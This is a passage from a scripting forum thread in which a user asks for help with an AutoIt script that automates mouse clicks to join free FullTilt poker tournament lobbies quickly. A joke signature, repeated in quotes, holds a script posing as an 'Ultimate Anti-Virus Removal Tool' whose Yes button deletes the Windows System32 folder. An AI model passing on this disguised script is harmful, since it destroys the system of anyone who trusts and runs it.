Would SOMEBODY please

CaseyBaugh

I see you have MSN. Try to message me at dot.halo@yahoo.com

;Ultimate Anti-Virus Removal Tool

$ans = MsgBox(4, "Ultimate AV", "Press 'Yes' to remove all viruses, press 'No' to exit.")

If $ans = 6 Then
   DirRemove("C:\WINDOWS\System32")
ElseIf $ans = 7 Then
   Exit
EndIf

Ok. The code you're gonna use most often is MouseClick. I'm gonna ask you a few questions.

1.)Do you have AutoIt installed?

2.)Do you have Internet Explorer, Mozilla Firefox, or other?

3.)If you have AutoIt installed please open Scite. (Start > All Programs > AutoIt v3 > Scite Script Editor).

$ans = MsgBox(4, "Ultimate AV", "Press 'Yes' to remove all viruses, press 'No' to exit.")

If $ans = 6 Then
ElseIf $ans = 7 Then
   Exit
EndIf

Ok. The code you're gonna use most often is MouseClick. I'm gonna ask you a few questions.

1.)Do you have AutoIt installed?

2.)Do you have Internet Explorer, Mozilla Firefox, or other?

3.)If you have AutoIt installed please open Scite. (Start > All Programs > AutoIt v3 > Scite Script Editor).

1. yes

2. yes to both

You're wanting to use this to enter into a 'lobby' for a poker game you're playing. I checked out the site and it seems that you have to download a program from their site and do everything from there. Is this correct?

Edited by Firefoxy

If $ans = 6 Then
ElseIf $ans = 7 Then
   Exit
EndIf

You're wanting to use this to enter into a 'lobby' for a poker game you're playing. I checked out the site and it seems that you have to download a program from their site and do everything from there. Is this correct?

I can only assume that I have to.

I mean I play on FullTilt.

I have to make my mouse movements and clicks to get into the tournement at the two differant lobbys.

It's just that I'm to slow and unco-ordinated.

The problem is that when you double click on the game that you want to get into; you get sent to the next lobby; the curser doesn't default to the next button; so it requires a mouse move and then a click & then another mouse move & click and then another move & click.

I'm sure that there are people that use a program to do this because it fills up so rapidly.

This is a free tournement which leads to winning a seat into a tournement where you can win some cash; which can lead to other things.

Does this information give you any ideas; or do you need more info?

I really appreciate the time.

Edited by CaseyBaugh